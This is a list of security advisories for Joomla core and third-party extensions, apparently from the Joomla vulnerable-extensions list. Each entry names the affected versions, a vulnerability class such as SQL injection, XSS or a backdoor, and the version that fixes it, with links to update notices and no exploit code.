Nexevo Contact Form, Backdoor

Nexevo Contact Form, Backdoor Resolution: update to 1.0.2 Users should also check for the existence of a plugin called System - Section among their installed extensions. It is malware and needs to be removed and the site treated as hacked. Further information here:...

Admin Tools Pro, 5.0.2, Information Disclosure

Admin Tools Pro by Akeeba, versions 5.0.2 and previous, Information Disclosure Resolution: update to 5.1.0 Update notice: https://www.akeebabackup.com/news/1693-admin-tools-security-bulletin-may-2018.html...

[20180602] - Core - XSS vulnerability in language switcher module

In some cases the link of the current language might contain unescaped HTML special characters. This may lead to reflective XSS via injection of arbitrary parameters and/or values on the current page url...

[20180503] - Core - Information Disclosure about unpublished tags

Inadequate checks allowed users to see the names of tags that were either unpublished or published with restricted view permission...

[20180601] - Core - Local File Inclusion with PHP 5.3

Our autoload code checks classnames to be valid, using the "classexists" function in PHP. In PHP 5.3 this function validates invalid names as valid, which can result in a Local File Inclusion...

Convert Forms, 2.0.3, CSV Injection

Convert Forms by Tassos.gr, versions 2.0.3 and previous, CSV Injection resolution: update to 2.0.4 update notice: https://www.tassos.gr/blog/convert-forms-2-0-4-security-release...

Gridbox com_gridbox, 2.4.0, Multiple Vulnerabilities

Gridbox comgridbox from balbooa.com, 2.4.0 and previous versions, multiple vulnerabilities including XSS, SQLi, arbitratry file download, insecure file upload, directory traversal Resolution: update to version 2.4.1.1 note that previous security release 2.4.1 fixed most of the issues but not all ...

Virtuemart 3.2.12 and previous, XSS

Virtuemart, versions 3.2.12 and previous, XSS Cross Site Scripting Resolution: update to 3.2.14 update notice: http://virtuemart.net/news/489-virtuemart-3-2-14-security-release-and-enhanced-invoice-handling...

jDownloads,3.2.58, XSS (Cross Site Scripting)

jDownloads, versions 3.2.58 and previous, XSS Cross Site Scripting resolution: update to 3.2.59 update notice: http://www.jdownloads.com/index.php/news/264-jdownloads-3-2-59-published.html...

Rapicode, Multiple Extensions, Back Door

Rapicode, nultiple extensions, current versions, back door Extensions affected are:- Rapi Content Ticker Rapi Content Carousel Rapi Cookie Consent Rapi Countdown Rapi Preloader Rapi Loading Progress Bar Rapi Page Animate At the moment the back door seems to be loading mining code, it can be used ...

JS Jobs,1.2.0,XSS (Cross Site Scripting)

JS Jobs from Joomsky.com, versions 1.2.0 and previous,XSS Cross Site Scripting resolution: update to 1.2.1 update notice: http://www.joomsky.com/products/js-jobs.html...

[20180508] - Core - Possible XSS attack in the redirect method

Under specific circumstances a redirect issued with a URI containing a username and password when the Location: header cannot be used, a lack of escaping the user-info component of the URI could result in a XSS vulnerability...

Watchfulli SSO Plugin,1.2, Other

Watchfulli SSO Plugin, versions 1.2 and previous, Other Resolution: update to version 1.3 update notice: https://watchful.li/news-blog/news/new-watchful-clients-and-sso-plugin-enhance-encryption...

mobilejoomla, 2.1.24, malcious redirects

mobilejoomla,2.1.24, malicious redirects. google adsense file added that may redirect all sites adsense revenue to the developer. File is not deleted on removing extension. Developer statement Extension Update Details Previously the free version of the Mobile extension added a file called ads.txt...

AcySMS, 3.5.0, CSV Injection

AcySMS by Acyba, versions 3.5.0 and previous, CSV Injection see https://vel.joomla.org/articles/2140-introducing-csv-injection resolution: update to 3.5.1 update notice: https://www.acyba.com/acysms/change-log.html...

AcyMailing, 5.9.5, CSV Injection

AcyMailing by Acyba, versions 5.9.5 and previous, CSV Injection see https://vel.joomla.org/articles/2140-introducing-csv-injection Resolution: update to 5.9.6 update notice: https://www.acyba.com/acymailing/change-log.html...

CP Event Calendar, 3.0.2, SQL Injection

CP Event Calendar from joomlacalendars.com, versions 3.0.2 and previous, SQL Injection resolution: update to 3.0.3 update notice: http://www.joomlacalendars.com/updates/cp-event-calendar-3.0.3...

Visual Calendar, 3.1.5, SQL Injection

Visual Calendar by Joomcalendars.com, versions 3.1.5 and previous, SQL Injection resolution: update to 3.1.6 update notice: http://www.joomlacalendars.com/updates/visual-calendar3.1.6...

Google Map Landkarten,4.2.3,SQL Injection

Google Map Landkarten from joomla-24.de, versions 4.2.3 and previous, SQL Injection...

Kunena,3.x - 5.0.13, Other

Kunena, 3.x - 5.0.13, Other - Normal user can take ownership from any user resolution: update to 5.0.14 update notice: https://www.kunena.org/blog/191-kunena-5-0-14-released...

[20180502] - Core - Add PHAR files to the upload blacklist

Depending on the server configuration, PHAR files might be handled as executable PHP scripts by the webserver...

Attachments, 3.2.5, SQL Injection

Attachments from jimcameron.net, versions 3.2.5 and previous, SQL Injection resolution: update to 3.2.6 update notice: http://jmcameron.net/attachments/...

JomEstate, 3.7, SQL Injection

JomEstate from comdev.eu, versions 3.7 and previous, SQL Injection resolution: resolved in version 3.8, current release is 4.1 update notice: none...

[20180301] - Core - SQLi vulnerability User Notes

The lack of type casting of a variable in SQL statement leads to a SQL injection vulnerability in the User Notes list view...

DT Register,3.2.7,SQL Injection

DT Register by DTH Development, versions 3.2.7 and previous, SQL Injection resolution: update to 3.2.8 update notice: https://www.dthdevelopment.com/dth-news/dt-register-328-security-update...

[20180501] - Core - ACL violation in access levels

Inadequate checks allowed users to modify the access levels of user groups with higher permissions...

Fastball, SQL Injection

Fastball by Fastball Productions, versions yet to be determined but probably all, SQL Injection...

JB Bus, 2.3, SQL Injection

JB Bus by Joombooking, 2.3, SQL Injection...

SquadManagement,1.0.3,SQL Injection

SquadManagement by Lars Hildebrandt, versions 1.0.3 and previous, SQL Injection...

Simple Calendar,3.1.9,SQL Injection

Simple Calendar by Fabrizio Albonico, versions 3.1.9 and previous, SQL Injection...

JQuickContact, 1.3.2.3, SQL Injection

JQuickContact by Wassim Jied, versions 1.3.2.3 and previous, SQL Injection resolution: update to 1.3.2.4 update notice: http://coderspirit.blogspot.com/2011/07/jquickcontact.html...

File Download Tracker,3.0,SQL Injection

File Download Tracker by techsolsystem.com, 3.0, SQL Injection...

PrayerCenter,3.0.2,SQL Injection

PrayerCenter by Mike Leeper MLWebTechnologies, versions 3.0.2 and previous,SQL Injection resolution: update to 3.0.3 update notice: https://github.com/MLWebTechnologies/PrayerCenter...

CW Tags, 2.0.8, SQL Injection

CW Tags by CW Joomla, versions 2.0.8 and previous, SQL Injection Note that the VEL do not agree with the developer's assessment of this as a "low level" security issue Resolution: update to version 2.1.1 Update notice: http://www.cwjoomla.com/download-cw-tags...

Checklist by Joomplace, 1.1.1.003, SQL Injection

Checklist by Joomplace, versions 1.1.1.003 and previous, SQL Injection resolution: update to 1.1.1.004 Update notice: https://www.joomplace.com/blog/security-update-for-checklist.html...

Ek rishta, 2.9, SQL Injection

Ek rishta by Harmis Technology, versions 2.9 and previous, SQL Injection Resolution: update to 2.10 update notice: https://joomlaextensions.co.in/extensions/other-extensions/product/Ek-Rishta...

NeoRecruit, 4.2.1, SQL Injection

NeoRecruit by NeoJoomla, versions 4.2.1 and previous, SQL Injection resolution: update to 4.2.2 update notice: http://www.neojoomla.com/index.php?option=comcontent=view=275=2...

JMS Music,1.1.1,SQL Injection

JMS Music by Joomasters, versions 1.1.1 and previous, SQL Injection...

JGive, 2.0.9, SQL Injection

JGive by Techjoomla.com, versions 2.0.9 and previous, SQL Injection resolution: update to 2.0.11 update notice: https://techjoomla.com/blog/jgive/release-updates-for-jticketing-jboloand-invitex...

Alexandria Book Library, 3.1.3, SQL Injection

Alexandria Book Library by Federica Ugolotti, versions 3.1.3 and previous, SQL Injection note that security release 3.1.3 does not fully fix the issue resolution: update to 3.1.4 update notice: alexandriabooklibrary.org/en/downloads/18-components.html...

Form Maker, 3.6.14, SQL Injection

Form Maker by Web Dorado, Versions 3.6.14 and previous, SQL Injection resolution: update to 3.6.15 note that previous security release did not completely fix the issue update notice: https://web-dorado.com/products/joomla-form.html...

Jticketing, 2.0.16, SQL Injection

Jticketing by techjoomla.com, versions 2.0.16 and previous, SQL Injection resolution: update to 2.0.18 update notice: https://techjoomla.com/blog/jgive/release-updates-for-jticketing-jboloand-invitex...

JS Autoz ,1.0.9,SQL Injection

JS Autoz by Joomsky.com, 1.0.9 and previous, SQL Injection...

Invitex, 3.0.5, SQL Injection

Invitex by techjoomla.com, versions 3.0.5 and previous, SQL Injection resolution: update to 3.0.6 update notice: https://techjoomla.com/blog/jgive/release-updates-for-jticketing-jboloand-invitex...

Gallery WD, 1.3.9, SQL Injection

Gallery WD by Web Dorado, versions 1.3.9 and previous, SQL Injection resolution: update to 1.3.10 update notice: https://web-dorado.com/products/joomla-gallery.html...

Media Library Free, 4.0.12, SQL Injection

Media Library Free by Ordasoft, versions 4.0.12 and previous, SQL Injection resolution: update to 4.0.21 update notice: https://ordasoft.com/News/News/media-library-security-update.html...

Realpin,1.5.04,SQL Injection

Realpin by Marcel Törpe, versions 1.5.04 and previous, SQL Injection...

OS Property, 3.12.8, SQL Injection

OS Property from Joomdonation.com, 3.12.8 and previous, SQL Injection resolution: update to 3.12.9 note that previous security release 3.12.8 did not completely fix the issue update notice: https://www.joomdonation.com/forum/os-property/61368-os-property-3-12-9-released-security-issue-fixed.html...

Joomla! Pinterest Clone Social Pinboard,2.0,SQL Injection

Joomla! Pinterest Clone Social Pinboard from apptha.com, 2.0, multiple SQL Injection vulnerabilities...

Proclaim, 9.1.1, Arbitrary File Upload

Proclaim from Christian Web Ministries installs as combiblestudy, versions 9.1.1 and previous, arbitrary file upload, also backup file download resolution: update to 9.1.2 fixes both issues update notice: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases...